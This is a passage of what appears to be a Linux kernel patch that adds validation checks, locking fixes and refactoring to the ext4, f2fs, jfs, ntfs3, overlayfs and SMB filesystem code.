+ 		err = ext4_mark_recovery_complete(sb, es);
+ 		if (err)
+-			goto failed_mount9;
++			goto failed_mount10;
+ 	}
+ 
+ 	if (test_opt(sb, DISCARD) && !bdev_max_discard_sectors(sb->s_bdev))
+@@ -5563,7 +5563,9 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 
+ 	return 0;
+ 
+-failed_mount9:
++failed_mount10:
++	ext4_quota_off_umount(sb);
++failed_mount9: __maybe_unused
+ 	ext4_release_orphan_info(sb);
+ failed_mount8:
+ 	ext4_unregister_sysfs(sb);
+@@ -5634,6 +5636,7 @@ failed_mount:
+ 	brelse(sbi->s_sbh);
+ 	ext4_blkdev_remove(sbi);
+ out_fail:
++	invalidate_bdev(sb->s_bdev);
+ 	sb->s_fs_info = NULL;
+ 	return err ? err : ret;
+ }
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index e50d5848c1001..fb75ff7b3448d 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -764,7 +764,7 @@ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task)
+ 		ret = -EFSCORRUPTED;
+ 
+ 		/* Avoid f2fs_commit_super in irq context */
+-		if (in_task)
++		if (!in_task)
+ 			f2fs_save_errors(sbi, ERROR_FAIL_DECOMPRESSION);
+ 		else
+ 			f2fs_handle_error(sbi, ERROR_FAIL_DECOMPRESSION);
+diff --git a/fs/f2fs/dir.c b/fs/f2fs/dir.c
+index 21960a899b6ad..bf5ba75b75d24 100644
+--- a/fs/f2fs/dir.c
++++ b/fs/f2fs/dir.c
+@@ -806,8 +806,15 @@ int f2fs_add_dentry(struct inode *dir, const struct f2fs_filename *fname,
+ {
+ 	int err = -EAGAIN;
+ 
+-	if (f2fs_has_inline_dentry(dir))
++	if (f2fs_has_inline_dentry(dir)) {
++		/*
++		 * Should get i_xattr_sem to keep the lock order:
++		 * i_xattr_sem -> inode_page lock used by f2fs_setxattr.
++		 */
++		f2fs_down_read(&F2FS_I(dir)->i_xattr_sem);
+ 		err = f2fs_add_inline_entry(dir, fname, inode, ino, mode);
++		f2fs_up_read(&F2FS_I(dir)->i_xattr_sem);
++	}
+ 	if (err == -EAGAIN)
+ 		err = f2fs_add_regular_entry(dir, fname, inode, ino, mode);
+ 
+diff --git a/fs/f2fs/xattr.c b/fs/f2fs/xattr.c
+index dc2e8637189e2..db3b641f2158c 100644
+--- a/fs/f2fs/xattr.c
++++ b/fs/f2fs/xattr.c
+@@ -527,10 +527,12 @@ int f2fs_getxattr(struct inode *inode, int index, const char *name,
+ 	if (len > F2FS_NAME_LEN)
+ 		return -ERANGE;
+ 
+-	f2fs_down_read(&F2FS_I(inode)->i_xattr_sem);
++	if (!ipage)
++		f2fs_down_read(&F2FS_I(inode)->i_xattr_sem);
+ 	error = lookup_all_xattrs(inode, ipage, index, len, name,
+ 				&entry, &base_addr, &base_size, &is_inline);
+-	f2fs_up_read(&F2FS_I(inode)->i_xattr_sem);
++	if (!ipage)
++		f2fs_up_read(&F2FS_I(inode)->i_xattr_sem);
+ 	if (error)
+ 		return error;
+ 
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index a3eb1e8269477..da6a2bc6bf022 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -178,7 +178,13 @@ int dbMount(struct inode *ipbmap)
+ 	dbmp_le = (struct dbmap_disk *) mp->data;
+ 	bmp->db_mapsize = le64_to_cpu(dbmp_le->dn_mapsize);
+ 	bmp->db_nfree = le64_to_cpu(dbmp_le->dn_nfree);
++
+ 	bmp->db_l2nbperpage = le32_to_cpu(dbmp_le->dn_l2nbperpage);
++	if (bmp->db_l2nbperpage > L2PSIZE - L2MINBLOCKSIZE) {
++		err = -EINVAL;
++		goto err_release_metapage;
++	}
++
+ 	bmp->db_numag = le32_to_cpu(dbmp_le->dn_numag);
+ 	if (!bmp->db_numag) {
+ 		err = -EINVAL;
+diff --git a/fs/jfs/jfs_filsys.h b/fs/jfs/jfs_filsys.h
+index b5d702df7111a..33ef13a0b1108 100644
+--- a/fs/jfs/jfs_filsys.h
++++ b/fs/jfs/jfs_filsys.h
+@@ -122,7 +122,9 @@
+ #define NUM_INODE_PER_IAG	INOSPERIAG
+ 
+ #define MINBLOCKSIZE		512
++#define L2MINBLOCKSIZE		9
+ #define MAXBLOCKSIZE		4096
++#define L2MAXBLOCKSIZE		12
+ #define	MAXFILESIZE		((s64)1 << 52)
+ 
+ #define JFS_LINK_MAX		0xffffffff
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 98491abf95b9d..9e9a9ffd92958 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -605,11 +605,58 @@ static const struct NTFS_DE *hdr_insert_head(struct INDEX_HDR *hdr,
+ 	return e;
+ }
+ 
++/*
++ * index_hdr_check
++ *
++ * return true if INDEX_HDR is valid
++ */
++static bool index_hdr_check(const struct INDEX_HDR *hdr, u32 bytes)
++{
++	u32 end = le32_to_cpu(hdr->used);
++	u32 tot = le32_to_cpu(hdr->total);
++	u32 off = le32_to_cpu(hdr->de_off);
++
++	if (!IS_ALIGNED(off, 8) || tot > bytes || end > tot ||
++	    off + sizeof(struct NTFS_DE) > end) {
++		/* incorrect index buffer. */
++		return false;
++	}
++
++	return true;
++}
++
++/*
++ * index_buf_check
++ *
++ * return true if INDEX_BUFFER seems is valid
++ */
++static bool index_buf_check(const struct INDEX_BUFFER *ib, u32 bytes,
++			    const CLST *vbn)
++{
++	const struct NTFS_RECORD_HEADER *rhdr = &ib->rhdr;
++	u16 fo = le16_to_cpu(rhdr->fix_off);
++	u16 fn = le16_to_cpu(rhdr->fix_num);
++
++	if (bytes <= offsetof(struct INDEX_BUFFER, ihdr) ||
++	    rhdr->sign != NTFS_INDX_SIGNATURE ||
++	    fo < sizeof(struct INDEX_BUFFER)
++	    /* Check index buffer vbn. */
++	    || (vbn && *vbn != le64_to_cpu(ib->vbn)) || (fo % sizeof(short)) ||
++	    fo + fn * sizeof(short) >= bytes ||
++	    fn != ((bytes >> SECTOR_SHIFT) + 1)) {
++		/* incorrect index buffer. */
++		return false;
++	}
++
++	return index_hdr_check(&ib->ihdr,
++			       bytes - offsetof(struct INDEX_BUFFER, ihdr));
++}
++
+ void fnd_clear(struct ntfs_fnd *fnd)
+ {
+ 	int i;
+ 
+-	for (i = 0; i < fnd->level; i++) {
++	for (i = fnd->level - 1; i >= 0; i--) {
+ 		struct indx_node *n = fnd->nodes[i];
+ 
+ 		if (!n)
+@@ -828,9 +875,16 @@ int indx_init(struct ntfs_index *indx, struct ntfs_sb_info *sbi,
+ 	u32 t32;
+ 	const struct INDEX_ROOT *root = resident_data(attr);
+ 
++	t32 = le32_to_cpu(attr->res.data_size);
++	if (t32 <= offsetof(struct INDEX_ROOT, ihdr) ||
++	    !index_hdr_check(&root->ihdr,
++			     t32 - offsetof(struct INDEX_ROOT, ihdr))) {
++		goto out;
++	}
++
+ 	/* Check root fields. */
+ 	if (!root->index_block_clst)
+-		return -EINVAL;
++		goto out;
+ 
+ 	indx->type = type;
+ 	indx->idx2vbn_bits = __ffs(root->index_block_clst);
+@@ -842,19 +896,19 @@ int indx_init(struct ntfs_index *indx, struct ntfs_sb_info *sbi,
+ 	if (t32 < sbi->cluster_size) {
+ 		/* Index record is smaller than a cluster, use 512 blocks. */
+ 		if (t32 != root->index_block_clst * SECTOR_SIZE)
+-			return -EINVAL;
++			goto out;
+ 
+ 		/* Check alignment to a cluster. */
+ 		if ((sbi->cluster_size >> SECTOR_SHIFT) &
+ 		    (root->index_block_clst - 1)) {
+-			return -EINVAL;
++			goto out;
+ 		}
+ 
+ 		indx->vbn2vbo_bits = SECTOR_SHIFT;
+ 	} else {
+ 		/* Index record must be a multiple of cluster size. */
+ 		if (t32 != root->index_block_clst << sbi->cluster_bits)
+-			return -EINVAL;
++			goto out;
+ 
+ 		indx->vbn2vbo_bits = sbi->cluster_bits;
+ 	}
+@@ -862,7 +916,14 @@ int indx_init(struct ntfs_index *indx, struct ntfs_sb_info *sbi,
+ 	init_rwsem(&indx->run_lock);
+ 
+ 	indx->cmp = get_cmp_func(root);
+-	return indx->cmp ? 0 : -EINVAL;
++	if (!indx->cmp)
++		goto out;
++
++	return 0;
++
++out:
++	ntfs_set_state(sbi, NTFS_DIRTY_DIRTY);
++	return -EINVAL;
+ }
+ 
+ static struct indx_node *indx_new(struct ntfs_index *indx,
+@@ -1020,6 +1081,13 @@ int indx_read(struct ntfs_index *indx, struct ntfs_inode *ni, CLST vbn,
+ 		goto out;
+ 
+ ok:
++	if (!index_buf_check(ib, bytes, &vbn)) {
++		ntfs_inode_err(&ni->vfs_inode, "directory corrupted");
++		ntfs_set_state(ni->mi.sbi, NTFS_DIRTY_ERROR);
++		err = -EINVAL;
++		goto out;
++	}
++
+ 	if (err == -E_NTFS_FIXUP) {
+ 		ntfs_write_bh(ni->mi.sbi, &ib->rhdr, &in->nb, 0);
+ 		err = 0;
+@@ -1607,9 +1675,9 @@ static int indx_insert_into_root(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 
+ 	if (err) {
+ 		/* Restore root. */
+-		if (mi_resize_attr(mi, attr, -ds_root))
++		if (mi_resize_attr(mi, attr, -ds_root)) {
+ 			memcpy(attr, a_root, asize);
+-		else {
++		} else {
+ 			/* Bug? */
+ 			ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
+ 		}
+diff --git a/fs/ntfs3/inode.c b/fs/ntfs3/inode.c
+index e52dfa5c7562c..dc937089a464a 100644
+--- a/fs/ntfs3/inode.c
++++ b/fs/ntfs3/inode.c
+@@ -81,7 +81,7 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 			 le16_to_cpu(ref->seq), le16_to_cpu(rec->seq));
+ 		goto out;
+ 	} else if (!is_rec_inuse(rec)) {
+-		err = -EINVAL;
++		err = -ESTALE;
+ 		ntfs_err(sb, "Inode r=%x is not in use!", (u32)ino);
+ 		goto out;
+ 	}
+@@ -92,8 +92,10 @@ static struct inode *ntfs_read_mft(struct inode *inode,
+ 		goto out;
+ 	}
+ 
+-	if (!is_rec_base(rec))
+-		goto Ok;
++	if (!is_rec_base(rec)) {
++		err = -EINVAL;
++		goto out;
++	}
+ 
+ 	/* Record should contain $I30 root. */
+ 	is_dir = rec->flags & RECORD_FLAG_DIR;
+@@ -472,7 +474,6 @@ end_enum:
+ 		inode->i_flags |= S_NOSEC;
+ 	}
+ 
+-Ok:
+ 	if (ino == MFT_REC_MFT && !sb->s_root)
+ 		sbi->mft.ni = NULL;
+ 
+@@ -526,6 +527,9 @@ struct inode *ntfs_iget5(struct super_block *sb, const struct MFT_REF *ref,
+ 		_ntfs_bad_inode(inode);
+ 	}
+ 
++	if (IS_ERR(inode) && name)
++		ntfs_set_state(sb->s_fs_info, NTFS_DIRTY_ERROR);
++
+ 	return inode;
+ }
+ 
+@@ -1641,10 +1645,8 @@ out6:
+ 		ntfs_remove_reparse(sbi, IO_REPARSE_TAG_SYMLINK, &new_de->ref);
+ 
+ out5:
+-	if (S_ISDIR(mode) || run_is_empty(&ni->file.run))
+-		goto out4;
+-
+-	run_deallocate(sbi, &ni->file.run, false);
++	if (!S_ISDIR(mode))
++		run_deallocate(sbi, &ni->file.run, false);
+ 
+ out4:
+ 	clear_rec_inuse(rec);
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index c5c022fef4e0b..24227b2e1b2b0 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -794,12 +794,12 @@ int run_pack(const struct runs_tree *run, CLST svcn, CLST len, u8 *run_buf,
+ 	     u32 run_buf_size, CLST *packed_vcns);
+ int run_unpack(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+ 	       CLST svcn, CLST evcn, CLST vcn, const u8 *run_buf,
+-	       u32 run_buf_size);
++	       int run_buf_size);
+ 
+ #ifdef NTFS3_CHECK_FREE_CLST
+ int run_unpack_ex(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+ 		  CLST svcn, CLST evcn, CLST vcn, const u8 *run_buf,
+-		  u32 run_buf_size);
++		  int run_buf_size);
+ #else
+ #define run_unpack_ex run_unpack
+ #endif
+diff --git a/fs/ntfs3/run.c b/fs/ntfs3/run.c
+index aaaa0d3d35a24..12d8682f33b53 100644
+--- a/fs/ntfs3/run.c
++++ b/fs/ntfs3/run.c
+@@ -919,12 +919,15 @@ out:
+  */
+ int run_unpack(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+ 	       CLST svcn, CLST evcn, CLST vcn, const u8 *run_buf,
+-	       u32 run_buf_size)
++	       int run_buf_size)
+ {
+ 	u64 prev_lcn, vcn64, lcn, next_vcn;
+ 	const u8 *run_last, *run_0;
+ 	bool is_mft = ino == MFT_REC_MFT;
+ 
++	if (run_buf_size < 0)
++		return -EINVAL;
++
+ 	/* Check for empty. */
+ 	if (evcn + 1 == svcn)
+ 		return 0;
+@@ -1046,7 +1049,7 @@ int run_unpack(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+  */
+ int run_unpack_ex(struct runs_tree *run, struct ntfs_sb_info *sbi, CLST ino,
+ 		  CLST svcn, CLST evcn, CLST vcn, const u8 *run_buf,
+-		  u32 run_buf_size)
++		  int run_buf_size)
+ {
+ 	int ret, err;
+ 	CLST next_vcn, lcn, len;
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index 88866bcd1a218..f5d3092f478c5 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -42,28 +42,26 @@ static inline size_t packed_ea_size(const struct EA_FULL *ea)
+  * Assume there is at least one xattr in the list.
+  */
+ static inline bool find_ea(const struct EA_FULL *ea_all, u32 bytes,
+-			   const char *name, u8 name_len, u32 *off)
++			   const char *name, u8 name_len, u32 *off, u32 *ea_sz)
+ {
+-	*off = 0;
++	u32 ea_size;
+ 
+-	if (!ea_all || !bytes)
++	*off = 0;
++	if (!ea_all)
+ 		return false;
+ 
+-	for (;;) {
++	for (; *off < bytes; *off += ea_size) {
+ 		const struct EA_FULL *ea = Add2Ptr(ea_all, *off);
+-		u32 next_off = *off + unpacked_ea_size(ea);
+-
+-		if (next_off > bytes)
+-			return false;
+-
++		ea_size = unpacked_ea_size(ea);
+ 		if (ea->name_len == name_len &&
+-		    !memcmp(ea->name, name, name_len))
++		    !memcmp(ea->name, name, name_len)) {
++			if (ea_sz)
++				*ea_sz = ea_size;
+ 			return true;
+-
+-		*off = next_off;
+-		if (next_off >= bytes)
+-			return false;
++		}
+ 	}
++
++	return false;
+ }
+ 
+ /*
+@@ -74,12 +72,12 @@ static inline bool find_ea(const struct EA_FULL *ea_all, u32 bytes,
+ static int ntfs_read_ea(struct ntfs_inode *ni, struct EA_FULL **ea,
+ 			size_t add_bytes, const struct EA_INFO **info)
+ {
+-	int err;
++	int err = -EINVAL;
+ 	struct ntfs_sb_info *sbi = ni->mi.sbi;
+ 	struct ATTR_LIST_ENTRY *le = NULL;
+ 	struct ATTRIB *attr_info, *attr_ea;
+ 	void *ea_p;
+-	u32 size;
++	u32 size, off, ea_size;
+ 
+ 	static_assert(le32_to_cpu(ATTR_EA_INFO) < le32_to_cpu(ATTR_EA));
+ 
+@@ -96,24 +94,31 @@ static int ntfs_read_ea(struct ntfs_inode *ni, struct EA_FULL **ea,
+ 
+ 	*info = resident_data_ex(attr_info, sizeof(struct EA_INFO));
+ 	if (!*info)
+-		return -EINVAL;
++		goto out;
+ 
+ 	/* Check Ea limit. */
+ 	size = le32_to_cpu((*info)->size);
+-	if (size > sbi->ea_max_size)
+-		return -EFBIG;
++	if (size > sbi->ea_max_size) {
++		err = -EFBIG;
++		goto out;
++	}
++
++	if (attr_size(attr_ea) > sbi->ea_max_size) {
++		err = -EFBIG;
++		goto out;
++	}
+ 
+-	if (attr_size(attr_ea) > sbi->ea_max_size)
+-		return -EFBIG;
++	if (!size) {
++		/* EA info persists, but xattr is empty. Looks like EA problem. */
++		goto out;
++	}
+ 
+ 	/* Allocate memory for packed Ea. */
+ 	ea_p = kmalloc(size_add(size, add_bytes), GFP_NOFS);
+ 	if (!ea_p)
+ 		return -ENOMEM;
+ 
+-	if (!size) {
+-		/* EA info persists, but xattr is empty. Looks like EA problem. */
+-	} else if (attr_ea->non_res) {
++	if (attr_ea->non_res) {
+ 		struct runs_tree run;
+ 
+ 		run_init(&run);
+@@ -124,24 +129,52 @@ static int ntfs_read_ea(struct ntfs_inode *ni, struct EA_FULL **ea,
+ 		run_close(&run);
+ 
+ 		if (err)
+-			goto out;
++			goto out1;
+ 	} else {
+ 		void *p = resident_data_ex(attr_ea, size);
+ 
+-		if (!p) {
+-			err = -EINVAL;
+-			goto out;
+-		}
++		if (!p)
++			goto out1;
+ 		memcpy(ea_p, p, size);
+ 	}
+ 
+ 	memset(Add2Ptr(ea_p, size), 0, add_bytes);
++
++	/* Check all attributes for consistency. */
++	for (off = 0; off < size; off += ea_size) {
++		const struct EA_FULL *ef = Add2Ptr(ea_p, off);
++		u32 bytes = size - off;
++
++		/* Check if we can use field ea->size. */
++		if (bytes < sizeof(ef->size))
++			goto out1;
++
++		if (ef->size) {
++			ea_size = le32_to_cpu(ef->size);
++			if (ea_size > bytes)
++				goto out1;
++			continue;
++		}
++
++		/* Check if we can use fields ef->name_len and ef->elength. */
++		if (bytes < offsetof(struct EA_FULL, name))
++			goto out1;
++
++		ea_size = ALIGN(struct_size(ef, name,
++					    1 + ef->name_len +
++						    le16_to_cpu(ef->elength)),
++				4);
++		if (ea_size > bytes)
++			goto out1;
++	}
++
+ 	*ea = ea_p;
+ 	return 0;
+ 
+-out:
++out1:
+ 	kfree(ea_p);
+-	*ea = NULL;
++out:
++	ntfs_set_state(sbi, NTFS_DIRTY_DIRTY);
+ 	return err;
+ }
+ 
+@@ -163,6 +196,7 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 	const struct EA_FULL *ea;
+ 	u32 off, size;
+ 	int err;
++	int ea_size;
+ 	size_t ret;
+ 
+ 	err = ntfs_read_ea(ni, &ea_all, 0, &info);
+@@ -175,8 +209,9 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 	size = le32_to_cpu(info->size);
+ 
+ 	/* Enumerate all xattrs. */
+-	for (ret = 0, off = 0; off < size; off += unpacked_ea_size(ea)) {
++	for (ret = 0, off = 0; off < size; off += ea_size) {
+ 		ea = Add2Ptr(ea_all, off);
++		ea_size = unpacked_ea_size(ea);
+ 
+ 		if (!ea->name_len)
+ 			break;
+@@ -230,7 +265,8 @@ static int ntfs_get_ea(struct inode *inode, const char *name, size_t name_len,
+ 		goto out;
+ 
+ 	/* Enumerate all xattrs. */
+-	if (!find_ea(ea_all, le32_to_cpu(info->size), name, name_len, &off)) {
++	if (!find_ea(ea_all, le32_to_cpu(info->size), name, name_len, &off,
++		     NULL)) {
+ 		err = -ENODATA;
+ 		goto out;
+ 	}
+@@ -272,7 +308,7 @@ static noinline int ntfs_set_ea(struct inode *inode, const char *name,
+ 	struct EA_FULL *new_ea;
+ 	struct EA_FULL *ea_all = NULL;
+ 	size_t add, new_pack;
+-	u32 off, size;
++	u32 off, size, ea_sz;
+ 	__le16 size_pack;
+ 	struct ATTRIB *attr;
+ 	struct ATTR_LIST_ENTRY *le;
+@@ -307,9 +343,8 @@ static noinline int ntfs_set_ea(struct inode *inode, const char *name,
+ 		size_pack = ea_info.size_pack;
+ 	}
+ 
+-	if (info && find_ea(ea_all, size, name, name_len, &off)) {
++	if (info && find_ea(ea_all, size, name, name_len, &off, &ea_sz)) {
+ 		struct EA_FULL *ea;
+-		size_t ea_sz;
+ 
+ 		if (flags & XATTR_CREATE) {
+ 			err = -EEXIST;
+@@ -332,8 +367,6 @@ static noinline int ntfs_set_ea(struct inode *inode, const char *name,
+ 		if (ea->flags & FILE_NEED_EA)
+ 			le16_add_cpu(&ea_info.count, -1);
+ 
+-		ea_sz = unpacked_ea_size(ea);
+-
+ 		le16_add_cpu(&ea_info.size_pack, 0 - packed_ea_size(ea));
+ 
+ 		memmove(ea, Add2Ptr(ea, ea_sz), size - off - ea_sz);
+diff --git a/fs/overlayfs/inode.c b/fs/overlayfs/inode.c
+index 9e61511de7a7c..677649b349658 100644
+--- a/fs/overlayfs/inode.c
++++ b/fs/overlayfs/inode.c
+@@ -497,20 +497,20 @@ static void ovl_idmap_posix_acl(struct inode *realinode,
+  */
+ struct posix_acl *ovl_get_acl(struct inode *inode, int type, bool rcu)
+ {
+-	struct inode *realinode = ovl_inode_real(inode);
++	struct inode *realinode;
+ 	struct posix_acl *acl, *clone;
+ 	struct path realpath;
+ 
+-	if (!IS_POSIXACL(realinode))
+-		return NULL;
+-
+ 	/* Careful in RCU walk mode */
+-	ovl_i_path_real(inode, &realpath);
+-	if (!realpath.dentry) {
++	realinode = ovl_i_path_real(inode, &realpath);
++	if (!realinode) {
+ 		WARN_ON(!rcu);
+ 		return ERR_PTR(-ECHILD);
+ 	}
+ 
++	if (!IS_POSIXACL(realinode))
++		return NULL;
++
+ 	if (rcu) {
+ 		acl = get_cached_acl_rcu(realinode, type);
+ 	} else {
+diff --git a/fs/overlayfs/overlayfs.h b/fs/overlayfs/overlayfs.h
+index 052226aa7de09..a3c59ac015ee6 100644
+--- a/fs/overlayfs/overlayfs.h
++++ b/fs/overlayfs/overlayfs.h
+@@ -369,7 +369,7 @@ enum ovl_path_type ovl_path_type(struct dentry *dentry);
+ void ovl_path_upper(struct dentry *dentry, struct path *path);
+ void ovl_path_lower(struct dentry *dentry, struct path *path);
+ void ovl_path_lowerdata(struct dentry *dentry, struct path *path);
+-void ovl_i_path_real(struct inode *inode, struct path *path);
++struct inode *ovl_i_path_real(struct inode *inode, struct path *path);
+ enum ovl_path_type ovl_path_real(struct dentry *dentry, struct path *path);
+ enum ovl_path_type ovl_path_realdata(struct dentry *dentry, struct path *path);
+ struct dentry *ovl_dentry_upper(struct dentry *dentry);
+diff --git a/fs/overlayfs/util.c b/fs/overlayfs/util.c
+index 850e8d1bf8296..0d8f96168e6cf 100644
+--- a/fs/overlayfs/util.c
++++ b/fs/overlayfs/util.c
+@@ -266,7 +266,7 @@ struct dentry *ovl_i_dentry_upper(struct inode *inode)
+ 	return ovl_upperdentry_dereference(OVL_I(inode));
+ }
+ 
+-void ovl_i_path_real(struct inode *inode, struct path *path)
++struct inode *ovl_i_path_real(struct inode *inode, struct path *path)
+ {
+ 	path->dentry = ovl_i_dentry_upper(inode);
+ 	if (!path->dentry) {
+@@ -275,6 +275,8 @@ void ovl_i_path_real(struct inode *inode, struct path *path)
+ 	} else {
+ 		path->mnt = ovl_upper_mnt(OVL_FS(inode->i_sb));
+ 	}
++
++	return path->dentry ? d_inode_rcu(path->dentry) : NULL;
+ }
+ 
+ struct inode *ovl_inode_upper(struct inode *inode)
+@@ -1121,8 +1123,7 @@ void ovl_copyattr(struct inode *inode)
+ 	struct inode *realinode;
+ 	struct user_namespace *real_mnt_userns;
+ 
+-	ovl_i_path_real(inode, &realpath);
+-	realinode = d_inode(realpath.dentry);
++	realinode = ovl_i_path_real(inode, &realpath);
+ 	real_mnt_userns = mnt_user_ns(realpath.mnt);
+ 
+ 	inode->i_uid = i_uid_into_mnt(real_mnt_userns, realinode);
+diff --git a/fs/smb/client/file.c b/fs/smb/client/file.c
+index 9a367d4c74e47..27c6d14e369f1 100644
+--- a/fs/smb/client/file.c
++++ b/fs/smb/client/file.c
+@@ -954,8 +954,8 @@ int cifs_close(struct inode *inode, struct file *file)
+ 		cfile = file->private_data;
+ 		file->private_data = NULL;
+ 		dclose = kmalloc(sizeof(struct cifs_deferred_close), GFP_KERNEL);
+-		if ((cinode->oplock == CIFS_CACHE_RHW_FLG) &&
+-		    cinode->lease_granted &&
++		if ((cifs_sb->ctx->closetimeo && cinode->oplock == CIFS_CACHE_RHW_FLG)
++		    && cinode->lease_granted &&
+ 		    !test_bit(CIFS_INO_CLOSE_ON_LOCK, &cinode->flags) &&
+ 		    dclose) {
+ 			if (test_and_clear_bit(CIFS_INO_MODIFIED_ATTR, &cinode->flags)) {
+diff --git a/fs/smb/client/smb2transport.c b/fs/smb/client/smb2transport.c
+index 790acf65a0926..22954a9c7a6c7 100644
+--- a/fs/smb/client/smb2transport.c
++++ b/fs/smb/client/smb2transport.c
+@@ -153,7 +153,14 @@ smb2_find_smb_ses_unlocked(struct TCP_Server_Info *server, __u64 ses_id)
+ 	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+ 		if (ses->Suid != ses_id)
+ 			continue;
++
++		spin_lock(&ses->ses_lock);
++		if (ses->ses_status == SES_EXITING) {
++			spin_unlock(&ses->ses_lock);
++			continue;
++		}
+ 		++ses->ses_count;
++		spin_unlock(&ses->ses_lock);
+ 		return ses;
+ 	}
+ 
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 2b7c0ba6a77de..26cf73d664f94 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -1339,9 +1339,8 @@ static int decode_negotiation_token(struct ksmbd_conn *conn,
+ 
+ static int ntlm_negotiate(struct ksmbd_work *work,
+ 			  struct negotiate_message *negblob,
+-			  size_t negblob_len)
++			  size_t negblob_len, struct smb2_sess_setup_rsp *rsp)
+ {
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+ 	struct challenge_message *chgblob;
+ 	unsigned char *spnego_blob = NULL;
+ 	u16 spnego_blob_len;
+@@ -1446,10 +1445,10 @@ static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+ 	return user;
+ }
+ 
+-static int ntlm_authenticate(struct ksmbd_work *work)
++static int ntlm_authenticate(struct ksmbd_work *work,
++			     struct smb2_sess_setup_req *req,
++			     struct smb2_sess_setup_rsp *rsp)
+ {
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct ksmbd_session *sess = work->sess;
+ 	struct channel *chann = NULL;
+@@ -1582,10 +1581,10 @@ binding_session:
+ }
+ 
+ #ifdef CONFIG_SMB_SERVER_KERBEROS5
+-static int krb5_authenticate(struct ksmbd_work *work)
++static int krb5_authenticate(struct ksmbd_work *work,
++			     struct smb2_sess_setup_req *req,
++			     struct smb2_sess_setup_rsp *rsp)
+ {
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+ 	struct ksmbd_conn *conn = work->conn;
+ 	struct ksmbd_session *sess = work->sess;
+ 	char *in_blob, *out_blob;
+@@ -1662,7 +1661,9 @@ static int krb5_authenticate(struct ksmbd_work *work)
+ 	return 0;
+ }
+ #else
+-static int krb5_authenticate(struct ksmbd_work *work)
++static int krb5_authenticate(struct ksmbd_work *work,
++			     struct smb2_sess_setup_req *req,
++			     struct smb2_sess_setup_rsp *rsp)
+ {
+ 	return -EOPNOTSUPP;
+ }
+@@ -1671,8 +1672,8 @@ static int krb5_authenticate(struct ksmbd_work *work)
+ int smb2_sess_setup(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
++	struct smb2_sess_setup_req *req;
++	struct smb2_sess_setup_rsp *rsp;
+ 	struct ksmbd_session *sess;
+ 	struct negotiate_message *negblob;
+ 	unsigned int negblob_len, negblob_off;
+@@ -1680,6 +1681,8 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Received request for session setup\n");
+ 
++	WORK_BUFFERS(work, req, rsp);
++
+ 	rsp->StructureSize = cpu_to_le16(9);
+ 	rsp->SessionFlags = 0;
+ 	rsp->SecurityBufferOffset = cpu_to_le16(72);
+@@ -1801,7 +1804,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 
+ 		if (conn->preferred_auth_mech &
+ 				(KSMBD_AUTH_KRB5 | KSMBD_AUTH_MSKRB5)) {
+-			rc = krb5_authenticate(work);
++			rc = krb5_authenticate(work, req, rsp);
+ 			if (rc) {
+ 				rc = -EINVAL;
+ 				goto out_err;
+@@ -1815,7 +1818,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			sess->Preauth_HashValue = NULL;
+ 		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
+ 			if (negblob->MessageType == NtLmNegotiate) {
+-				rc = ntlm_negotiate(work, negblob, negblob_len);
++				rc = ntlm_negotiate(work, negblob, negblob_len, rsp);
+ 				if (rc)
+ 					goto out_err;
+ 				rsp->hdr.Status =
+@@ -1828,7 +1831,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 						le16_to_cpu(rsp->SecurityBufferLength) - 1);
+ 
+ 			} else if (negblob->MessageType == NtLmAuthenticate) {
+-				rc = ntlm_authenticate(work);
++				rc = ntlm_authenticate(work, req, rsp);
+ 				if (rc)
+ 					goto out_err;
+ 
+@@ -1926,14 +1929,16 @@ out_err:
+ int smb2_tree_connect(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_tree_connect_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_tree_connect_rsp *rsp = smb2_get_msg(work->response_buf);
